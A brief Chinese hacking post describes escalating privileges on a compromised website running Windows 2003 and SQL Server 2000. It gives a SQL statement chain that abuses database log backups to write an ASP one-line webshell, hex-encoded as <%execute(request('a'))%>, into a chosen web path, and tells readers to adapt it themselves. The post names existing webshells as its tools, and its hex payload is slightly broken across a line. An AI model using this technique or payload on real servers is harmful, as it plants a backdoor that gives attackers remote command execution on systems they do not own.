前天帮死亡节奏提权一黑客站使用一种技术写出来大家分享。

测试环境:
windows 2003 SQLserver 2000 mysql5.x 目标站点是asp，有shell的站点是aspx。shell的SQLserver2000权限是public。

使用工具:
aspxIISpy马  专业操作SQLserver数据库马

使用aspxIISpy马得到目标路径，使用SQLserver马操作backup webshell。
语句如下：
alter database null set RECOVERY FULL;create table cmd (a image);backup log null to disk = "f:\cmd" with init;insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292
9253EDA);backup log null to disk = "备份路径"--

语句里边的一些东西需要自己修改！